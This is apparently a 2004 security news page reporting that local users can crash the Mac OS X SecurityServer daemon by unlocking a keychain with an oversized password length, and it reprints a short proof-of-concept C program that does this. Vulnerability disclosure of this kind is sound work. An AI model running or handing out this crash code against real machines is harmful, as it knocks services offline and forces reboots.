Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | Mac OS X SecurityServer Can Be Crashed By Local Users |
|---|
Categorie: Vulnerability
Posted: 2004-01-05 by ReCall
Views: 410
Source: Click here
| Current Rating: Not rated
|
| | Details |
|---|
Description: A denial of service vulnerability was reported in the Mac OS X SecurityServer. A local user can cause the SecurityServer to crash.
Matt Burnett reported that a local user can unlock a locked keychain and specify a long password to cause the SecurityServer daemon to crash.
When the SecurityServer daemon crashes, other process will crash, the report said. The system must be rebooted to return to normal operation, according to the report.
A demonstration exploit:
Proof Of Concept Code
To build this code run ?gcc -framework Security o
CrashSecurityServer?
#include
int main(int argc, const char *argv[])
SecKeychainRef defaultKeychain;
SecKeychainCopyDefault(&defaultKeychain);
SecKeychainLock(defaultKeychain);
SecKeychainUnlock(defaultKeychain, 0xFFFFFFFF, "password", true);
return 0;
The vendor was reportedly notified on November 20, 2003.
Impact: A local user can cause the SecurityServer daemon (and ultimately many other services) to crash.
Solution: No solution was available at the time of this entry.
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=628
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
